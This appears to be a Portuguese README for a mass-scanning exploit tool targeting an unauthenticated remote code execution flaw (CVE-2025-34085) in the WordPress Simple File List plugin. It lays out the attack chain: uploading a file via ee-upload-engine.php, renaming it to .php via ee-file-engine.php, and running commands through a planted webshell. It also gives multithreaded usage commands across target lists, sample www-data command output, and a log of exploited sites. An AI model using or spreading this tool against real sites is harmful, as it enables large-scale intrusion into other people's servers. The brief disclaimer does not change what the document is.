
Scanner automatizado e exploit para CVE-2025-34085, uma RCE não autenticada no plugin WordPress Simple File List. Suporta varredura de múltiplos alvos, upload de webshell e execução remota de comandos.
Ferramenta automatizada para detectar e explorar Remote Code Execution (RCE) não autenticada no plugin WordPress Simple File List, especialmente os vulneráveis ao CVE-2025-34085.
Equipada com sistema de limpeza automática de alvos e suporte a multithread para ser eficiente em larga escala.
Upload de Arquivo sem Autenticação
/wp-content/plugins/simple-file-list/ee-upload-engine.phpRenomear o Arquivo para .php
/wp-content/plugins/simple-file-list/ee-file-engine.phpExecução Remota do Payload
python3 main.py -u http://target.com --cmd "id"
Coloque a lista de alvos no arquivo targets.txt, um por linha:
python3 main.py --cmd "uname -a"
| Argumento | Descrição |
|---|---|
-u | Alvo único (exemplo: http://example.com) |
--cmd | Comando a ser executado no alvo (padrão: id) |
--inline | Usar payload inline (sem o parâmetro ?cmd=) |
[+] http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Os alvos bem-sucedidos são salvos automaticamente no arquivo vuln.txt.
main.py — Script principaltargets.txt — Lista de alvosclean_targets.txt — Resultado da normalização de URLvuln.txt — Log de alvos explorados com sucessotargets.txtAdministradores de sites WordPress são aconselhados a:
Este projeto é apenas para aprendizado e testes legítimos.
O uso para fins ilegais é de responsabilidade de cada indivíduo.
Cyberlone Indonesia não se responsabiliza pelo uso indevido desta ferramenta.
Licença: MIT License
Use, modifique e distribua livremente para fins legítimos e responsáveis.
Cyberlone Indonesia
🛠️ Equipe de Pesquisa & Exploração
🔗 GitHub: https://github.com/yukinime
👨💻 0xgh057r3c0n
🔗 GitHub: github.com/0xgh057r3c0n